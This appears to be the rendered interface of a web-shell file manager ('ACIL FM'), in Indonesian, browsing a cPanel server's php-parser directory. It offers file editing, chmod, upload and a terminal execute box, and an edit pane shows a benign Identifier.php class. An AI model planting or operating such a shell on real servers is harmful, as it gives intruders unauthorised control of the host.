ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/nikic/php-parser/lib/PhpParser/Node
/
opt
cpanel
ea-wappspector
vendor
nikic
php-parser
lib
PhpParser
Node
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Expr
-
chmod
Open
Rename
Delete
Name
-
chmod
Open
Rename
Delete
Scalar
-
chmod
Open
Rename
Delete
Stmt
-
chmod
Open
Rename
Delete
Arg.php
1.27 MB
chmod
View
DL
Edit
Rename
Delete
ArrayItem.php
1.18 MB
chmod
View
DL
Edit
Rename
Delete
Attribute.php
820 B
chmod
View
DL
Edit
Rename
Delete
AttributeGroup.php
647 B
chmod
View
DL
Edit
Rename
Delete
ClosureUse.php
973 B
chmod
View
DL
Edit
Rename
Delete
ComplexType.php
323 B
chmod
View
DL
Edit
Rename
Delete
Const_.php
971 B
chmod
View
DL
Edit
Rename
Delete
DeclareItem.php
992 B
chmod
View
DL
Edit
Rename
Delete
Expr.php
133 B
chmod
View
DL
Edit
Rename
Delete
FunctionLike.php
731 B
chmod
View
DL
Edit
Rename
Delete
Identifier.php
2.07 MB
chmod
View
DL
Edit
Rename
Delete
InterpolatedStringPart.php
850 B
chmod
View
DL
Edit
Rename
Delete
IntersectionType.php
665 B
chmod
View
DL
Edit
Rename
Delete
MatchArm.php
652 B
chmod
View
DL
Edit
Rename
Delete
Name.php
8.47 MB
chmod
View
DL
Edit
Rename
Delete
NullableType.php
679 B
chmod
View
DL
Edit
Rename
Delete
Param.php
3.7 MB
chmod
View
DL
Edit
Rename
Delete
PropertyHook.php
3.35 MB
chmod
View
DL
Edit
Rename
Delete
PropertyItem.php
1.05 MB
chmod
View
DL
Edit
Rename
Delete
Scalar.php
98 B
chmod
View
DL
Edit
Rename
Delete
StaticVar.php
999 B
chmod
View
DL
Edit
Rename
Delete
Stmt.php
133 B
chmod
View
DL
Edit
Rename
Delete
UnionType.php
677 B
chmod
View
DL
Edit
Rename
Delete
UseItem.php
1.64 MB
chmod
View
DL
Edit
Rename
Delete
VariadicPlaceholder.php
653 B
chmod
View
DL
Edit
Rename
Delete
VarLikeIdentifier.php
502 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/nikic/php-parser/lib/PhpParser/Node/Identifier.php
<?php declare(strict_types=1); namespace PhpParser\Node; use PhpParser\NodeAbstract; /** * Represents a non-namespaced name. Namespaced names are represented using Name nodes. */ class Identifier extends NodeAbstract { /** * @psalm-var non-empty-string * @var string Identifier as string */ public string $name; /** @var array<string, bool> */ private static array $specialClassNames = [ 'self' => true, 'parent' => true, 'static' => true, ]; /** * Constructs an identifier node. * * @param string $name Identifier as string * @param array<string, mixed> $attributes Additional attributes */ public function __construct(string $name, array $attributes = []) { if ($name === '') { throw new \InvalidArgumentException('Identifier name cannot be empty'); } $this->attributes = $attributes; $this->name = $name; } public function getSubNodeNames(): array { return ['name']; } /** * Get identifier as string. * * @psalm-return non-empty-string * @return string Identifier as string. */ public function toString(): string { return $this->name; } /** * Get lowercased identifier as string. * * @psalm-return non-empty-string&lowercase-string * @return string Lowercased identifier as string */ public function toLowerString(): string { return strtolower($this->name); } /** * Checks whether the identifier is a special class name (self, parent or static). * * @return bool Whether identifier is a special class name */ public function isSpecialClassName(): bool { return isset(self::$specialClassNames[strtolower($this->name)]); } /** * Get identifier as string. * * @psalm-return non-empty-string * @return string Identifier as string */ public function __toString(): string { return $this->name; } public function getType(): string { return 'Identifier'; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply